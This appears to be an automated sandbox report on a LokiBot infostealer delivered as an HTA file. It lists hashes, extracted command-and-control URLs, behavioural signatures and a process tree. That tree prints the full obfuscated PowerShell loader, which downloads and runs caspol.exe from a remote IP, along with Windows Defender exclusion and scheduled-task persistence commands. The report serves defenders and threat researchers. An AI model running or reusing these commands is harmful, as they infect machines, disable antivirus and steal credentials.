Analysis
-
max time kernel
119s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20-11-2024 07:19
Static task
static1
Behavioral task
behavioral1
Sample
greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta
Resource
win10v2004-20241007-en
General
-
Target
greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta
-
Size
178KB
-
MD5
4ce3b0e612e1968b6c491ab1ab818884
-
SHA1
cbc890a816e9b7e993c90fb63d51526a76616323
-
SHA256
a786cb2ae0dc8117e3bfc07bca8bb0e5d4545ab8f5b4aa042c9ee85dca7b43a0
-
SHA512
9b87141b10a2e781e51483dced485817aeb34b545f6dbf64803b4b3621cd4dd74587a5033ab1aa3b931fbd39bc7c77650a0ccdd6b4132b48fbeab9d0fbb3d816
-
SSDEEP
96:4vCl17HUofTaTGoHTapZR3CyYaMJhS1i3hTaNopQ:4vCldHULTG3pZLYKi3gN2Q
Malware Config
Extracted
lokibot
http://94.156.177.41/simple/five/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
Lokibot family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 4 1352 pOweRShelL.EXe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1060 powershell.exe 1456 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
pid Process 1352 pOweRShelL.EXe 2744 powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 2844 caspol.exe 2216 caspol.exe -
Loads dropped DLL 3 IoCs
pid Process 1352 pOweRShelL.EXe 1352 pOweRShelL.EXe 1352 pOweRShelL.EXe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook caspol.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook caspol.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook caspol.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2844 set thread context of 2216 2844 caspol.exe 44 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pOweRShelL.EXe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language caspol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1836 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1352 pOweRShelL.EXe 2744 powershell.exe 2844 caspol.exe 1060 powershell.exe 1456 powershell.exe 2844 caspol.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 1352 pOweRShelL.EXe Token: SeDebugPrivilege 2744 powershell.exe Token: SeDebugPrivilege 2844 caspol.exe Token: SeDebugPrivilege 1060 powershell.exe Token: SeDebugPrivilege 1456 powershell.exe Token: SeDebugPrivilege 2216 caspol.exe -
Suspicious use of WriteProcessMemory 42 IoCs
description pid Process procid_target PID 1632 wrote to memory of 1352 1632 mshta.exe 31 PID 1632 wrote to memory of 1352 1632 mshta.exe 31 PID 1632 wrote to memory of 1352 1632 mshta.exe 31 PID 1632 wrote to memory of 1352 1632 mshta.exe 31 PID 1352 wrote to memory of 2744 1352 pOweRShelL.EXe 33 PID 1352 wrote to memory of 2744 1352 pOweRShelL.EXe 33 PID 1352 wrote to memory of 2744 1352 pOweRShelL.EXe 33 PID 1352 wrote to memory of 2744 1352 pOweRShelL.EXe 33 PID 1352 wrote to memory of 2620 1352 pOweRShelL.EXe 34 PID 1352 wrote to memory of 2620 1352 pOweRShelL.EXe 34 PID 1352 wrote to memory of 2620 1352 pOweRShelL.EXe 34 PID 1352 wrote to memory of 2620 1352 pOweRShelL.EXe 34 PID 2620 wrote to memory of 2096 2620 csc.exe 35 PID 2620 wrote to memory of 2096 2620 csc.exe 35 PID 2620 wrote to memory of 2096 2620 csc.exe 35 PID 2620 wrote to memory of 2096 2620 csc.exe 35 PID 1352 wrote to memory of 2844 1352 pOweRShelL.EXe 37 PID 1352 wrote to memory of 2844 1352 pOweRShelL.EXe 37 PID 1352 wrote to memory of 2844 1352 pOweRShelL.EXe 37 PID 1352 wrote to memory of 2844 1352 pOweRShelL.EXe 37 PID 2844 wrote to memory of 1060 2844 caspol.exe 38 PID 2844 wrote to memory of 1060 2844 caspol.exe 38 PID 2844 wrote to memory of 1060 2844 caspol.exe 38 PID 2844 wrote to memory of 1060 2844 caspol.exe 38 PID 2844 wrote to memory of 1456 2844 caspol.exe 40 PID 2844 wrote to memory of 1456 2844 caspol.exe 40 PID 2844 wrote to memory of 1456 2844 caspol.exe 40 PID 2844 wrote to memory of 1456 2844 caspol.exe 40 PID 2844 wrote to memory of 1836 2844 caspol.exe 42 PID 2844 wrote to memory of 1836 2844 caspol.exe 42 PID 2844 wrote to memory of 1836 2844 caspol.exe 42 PID 2844 wrote to memory of 1836 2844 caspol.exe 42 PID 2844 wrote to memory of 2216 2844 caspol.exe 44 PID 2844 wrote to memory of 2216 2844 caspol.exe 44 PID 2844 wrote to memory of 2216 2844 caspol.exe 44 PID 2844 wrote to memory of 2216 2844 caspol.exe 44 PID 2844 wrote to memory of 2216 2844 caspol.exe 44 PID 2844 wrote to memory of 2216 2844 caspol.exe 44 PID 2844 wrote to memory of 2216 2844 caspol.exe 44 PID 2844 wrote to memory of 2216 2844 caspol.exe 44 PID 2844 wrote to memory of 2216 2844 caspol.exe 44 PID 2844 wrote to memory of 2216 2844 caspol.exe 44 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook caspol.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook caspol.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe"C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1352 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2744
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yygz-_yf.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD7BA.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD7B9.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2096
-
-
-
C:\Users\Admin\AppData\Roaming\caspol.exe"C:\Users\Admin\AppData\Roaming\caspol.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1060
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\rrwscqkDSNwLK.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1456
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\Admin\AppData\Local\Temp\tmp5B69.tmp"4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1836
-
-
C:\Users\Admin\AppData\Roaming\caspol.exe"C:\Users\Admin\AppData\Roaming\caspol.exe"4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2216
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD53112e1b1ad9c31faa74f1c23fa539356
SHA1a4ca1a7c6858078749fbb53e96452563c6a6e2d4
SHA256c5e3ca49a654c74b23b45b9c10bd52a07074f089296d7f238c07f70e59df95f2
SHA512e6d8b36b949240b2176608cde7391db5aa2bfa02926be81777b3969970b6f2a83208185e3398377cfd53c3f0483665f4ef35a2b46aeb0b08204503d581b20626
-
Filesize
1KB
MD5644acd672def50f90420e4f03528d496
SHA103ddd4937e44f36e9cfbfd97812b8f0cd44fef73
SHA256f0200586128367b78d108181914aee71aa5e921161c36921a9f98d291f86c2bf
SHA51231ff4b7640c0a06e83741a132413b4bf85773d14b0a7a5a12306339f76b2fa4a66aa3934bca47ba4a6639ad7861a94c689a4d907ed81c5182e6d551d451bcac3
-
Filesize
3KB
MD563b7c94192c91c41ed9599d4027f1864
SHA12f729fbeef93d95f38291ff15a4f2a1e8abfe46f
SHA256f44cf0ee89deea2b92ceb23342473d7bfef4f86be796ad4426f263aaf09795ed
SHA512b11e3dafe861af2947c600261889f6b7985bfaee5e73925444e8edd779e0988fc000bb8f875d6bc49431e295dfc57559f58eb3d0de2afedf8eb744f2620165d8
-
Filesize
7KB
MD5a45938611a6990e0538f54be4863c634
SHA1661d7dc529ae744893df27e5d2d89135a7976434
SHA2568d76319dd56ad6740350d97cadcc4353a8b5565687dd1e0e0b5fde43eec4ecdf
SHA512a73e7d284d259e94c3a70a4fed37b6a659327bbe3fc0d6838db63a9170e521d7032f9eaec1eec9a8b69d841448a5b2daea15882d9134d5090410958aef66ea1b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1846800975-3917212583-2893086201-1000\0f5007522459c86e95ffcc62f32308f1_f9da27c9-c625-43c3-9b3a-b1344b01e128
Filesize46B
MD5d898504a722bff1524134c6ab6a5eaa5
SHA1e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA51226a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1846800975-3917212583-2893086201-1000\0f5007522459c86e95ffcc62f32308f1_f9da27c9-c625-43c3-9b3a-b1344b01e128
Filesize46B
MD5c07225d4e7d01d31042965f048728a0a
SHA169d70b340fd9f44c89adb9a2278df84faa9906b7
SHA2568c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA51223d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD59a5f8f28cd7be7a84d1d0cf33bac967f
SHA1d3f2b64909980123efdb7077997b8fb7df2bd841
SHA25601f303a121024bbf0992561d9323bf218cddd617d82aea5d862c12da974bdafd
SHA5123226321cd441392715cafd9f0909048ccc3003d747625e20b0631f3ef2eed89248c5bdfcd4cb0c6256a830c1b6653a64dfdf78ceb215fffbf7d5f9aa1512434f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD535fa34d8e175aca60aa63d5c0bbba04d
SHA12b12ff28f32f3cfd7e102c55b77efef53086784c
SHA2563436cbceb57520feca975a98b44df7f33c453560b3f8f9f7103fe7f327a23051
SHA5128028b4c926e3fc56ac7649c15cf1824071296c2ca48d399b27a7841a9dc645da791fed16081abbb690835badf20b5909ad9c3f101752a1b9b00dffeeb618a53f
-
Filesize
652B
MD5df2a95e4185073c5332d6df93099c54e
SHA173414dc5dda05bdcae60ad1a0ee19821dfb06088
SHA2564be699c85a59f2bfeca2f059afbd77573231bae4947bde88c5bd9db246494670
SHA512cf13d791464125af71aa959634674bf5e6abe80a09493683d5fd1cb78cbc0f22e4f3034552bd0971b84216cb0ce72b526e8e8e31d2f1aa15ced80a14b5700a4a
-
Filesize
484B
MD5fe82050659a8b97690d60529499222c1
SHA17cc50135852b46dd1e36f2ff98506613db525a68
SHA25664c38563c4588b718b03aec685677f173456d3c961ef97cd95e7784ee1e51a6a
SHA51259356fd5cbb38a06bf09e182b8ed7c7c2200e6f8de8e950be38bee0c45aa96b2dbf202bdc56097a74acc4e0a8bc601558e83c098a376630cfa1bcce64133d64f
-
Filesize
309B
MD55423583de2ddb787508e3d60ef57237d
SHA19ae2c941350820f705adced6f8d7327de8aa56a9
SHA2563a75ab620ed0a503c47f6d8843b5c224525f67fe9ed28f54561043a650a43cd1
SHA51239a84d9ec48bffcef7d6b50adfcb1f18dadd7a6366e76a56415c222dfcde2ed82cabc7f8e46230f4873e11655d79ea4d9374e70f2ffd5e1aa98e1ba02b1ff7ec
-
Filesize
586KB
MD574061922f1e78c237a66d12a15a18181
SHA1e31ee444aaa552a100f006e43f0810497a3b0387
SHA25689bf888148eae2caabdc6d3fff98054127b197b402493581894a3104ed6b6f1c
SHA512306744107d78b02ecfd28252dae954f0b47c1f761e15a33c937474a2e15284c17bb7e2542618b745ea5f95e5a7dba3d27b675c8837914a44d8b5b350a3d4a136